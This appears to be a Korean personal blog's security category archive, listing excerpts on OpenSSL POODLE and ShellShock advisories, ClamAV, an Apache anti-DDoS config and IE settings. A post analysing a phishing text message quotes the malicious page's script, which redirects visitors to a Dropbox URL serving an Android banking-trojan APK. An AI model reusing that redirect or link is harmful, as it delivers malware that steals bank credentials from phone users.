Category Archives: [DEV]보안

SSL 3 is dead, killed by the POODLE attack // 보인인증서 SSL3가 해킹당했다는 내용

해결됨 OpenSSL에서 발생한 메모리 고갈 취약점, 푸들(Poodle, Padding Oracle On Downloaded Legacy Encryption) 취약점 등 총 4개의 취약점을 보완한 보안업데이트를 발표 CVE-2014-3513 : DTLS SRTP 핸드쉐이크 메시지를 처리하는 중 발생하는 메모리 고갈 CVE-2014-3567 : SSL/TLS/DTLS 서버에서 session ticket 값을 받을 때 발생하는 메모리 CVE-2014-3566 : SL3.0에서 다운 그레이드를 통해 MITM(man-in-the-middle)공격을 가능하게 하는 Poodle(Padding Oracle On… Read More »

9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)

최근 9월 25일 발견된 Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169)에 대하여 안내 드립니다. – 이름 : Gnu bash 취약점 (ShellShock, CVE-2014-6271, CVE-2014-7169) – 취약점 정보 : GNU bash 4.3 및 이전 버전 GNU bash 취약점을 이용하여 여러가지 공격 유형이 탐지되고 있음 ex) 백도어 생성, 악성코드 다운로드, 패스워드 파일 탈취, 웹쉘 생성, 파일 삭제, 시스템 강제… Read More »

스마트폰 피싱 문자=> KB 은행 앱 해킹용

[법원] 민사소송 출석명령서입니다. 라고 문자 날라와서. 크롬으로 사이트 들어가 보니 <script>location.replace(‘https://www.dropbox.com/s/ev44e5vwd8joyac/16yk.apk?dl=1’);</script> 16yk.apk 파일 다운로드 되네요. 아이폰에는 안갈리겠고  안드로이드용 입니다. 털림 1.특정 SMS 계정 털림 (국내) 2. url.kr 사이트 ftp 털림 (국내) 3. dropbox.com ftp 털림 (해외 :미국) 소스 확인해보니 k b _ c a r d _ l a y o u t  택스트 보이는 거… Read More »

win server FTP Event log

잘못된 ftp 계정으로 로그인 하면  시스템 로그  보안경고 1개 와  보안 실패감사 로그 2개가 생성된다. 시스템 이벤트번호는 100 보안이벤트 번호는  529와 680 이다.

Trojan/Win32.Necurs 바이러스 제거

하드때서 외장하드로 연결해 V3 돌리거나 MS 에서 하는 백신 한번 돌리면 검색 되고 치료 됩니다. http://www.microsoft.com/security/scanner/ko-kr/default.aspx

유튜브 에러 메시지 2014-02-18 오전 12:30

500 Internal Server Error Sorry, something went wrong. A team of highly trained monkeys has been dispatched to deal with this situation. If you see them, show them this information:

인터넷을 거꾸로 화살표 돌리면 [웹 페이지가 만료되었습니다.]

웹 페이지가 만료되었습니다. 가능성이 높은 원인: •이 웹 페이지의 로컬 복사본이 오래되었으므로 다시 다운로드해야 합니다. 가능한 해결 방법: 도구 모음의 [새로 고침] 단추를 클릭하여 페이지를 다시 로드하십시오. 페이지를 새로 고친 후에 특정 웹 페이지를 다시 탐색하거나 정보를 다시 입력해야 합니다. 추가 정보 이 문제가 계속되면 다음 방법을 시도해 보십시오. 1.Internet Explorer에서 [도구], [인터넷 옵션], [고급]… Read More »

[ubuntu] 리눅스용 바이러스 백신 – ClamAV

apt-get install clamav ClamAV(Clam AntiVirus)는 공개용 백신으로 윈도우즈, 리눅스, OS X 용 버젼들이 있다. 실시간 탐지가 되지 않는 백신이므로 시스템을 주기적으로 스캐닝하여 바이러스를 탐지해야만 한다. 리눅스 시스템 운영시 크게 3가지 이유로 백신이 필요 할 수 있다. 1) 웹서버를 운영하는 경우 웹쉘 관련 스크립트(php, jsp)나 악성코드 등을 탐지 2) 윈도우즈 시스템을 위한 파일서버(SMB, FTP, 웹업로드)를 운영할… Read More »

아파치 DDos 방지

아파치의 httpd-user.conf 파일 맨 하단에 #DOS 공격 보안 모듈입니다. #1초동안 5 개 페이지 요청 또는 1초 동안 75개 파일 요청시 #10초동안 403 메세지를 뿌리며 제한합니다. LoadModule evasive_module modules/mod_evasive.so DOSHashTableSize 3097 DOSPageCount 5 DOSPageInterval 1 DOSSiteCount 75 DOSSiteInterval 1 DOSBlockingPeriod 10 DOSLogDir “로그를 남길 파일” 를 추가하시면 적용 가능합니다.

익스플로러 스크립트 오류창 방지 방법

●화면에서 계속 스크립트 오류가 발생 ●메뉴중 도구->인터넷 옵션(O) 선택 ●인터넷 옵션에서  보안 탭 ->사용자 지정 수전(C) 선택 ● 도메인간 호환성 사용 ● 스크립트 사용 ● 스크립틀릿 허용 ● 보안으로 이동-> 모든 오류에 관한 사항 디버그 사용 안함 ● 타사 사브라우저 확장 사용 안함. ● UTF-8 로 보내기 사용

휘슬(WHISTL) 추천안함

휘슬(WHISTL) 관련 FAQ 한국인터넷진흥원 침해대응센터 ○ 휘슬(WHISTL)이 무엇인가요? 공격자가 웹서버에 설치한 백도어 프로그램인 웹쉘 및 악성코드 은닉사이트를 탐지하는 프로그램입니다. ○ 휘슬(WHISTL)은 어떤 뜻인가요? WHISTL은 Web Hacking Inspection Security TooL의 머리글자 모음입니다. 또한 발음으로는 Whistle와 동일하여 호루라기, 경적을 의미합니다. 이는 해당 프로그램이 웹쉘 및 악성코드 은닉 사이트를 탐지하는 경우 관리자에게 알려주어 대응을 하도록 한다는 의미로서 WHISTL을… Read More »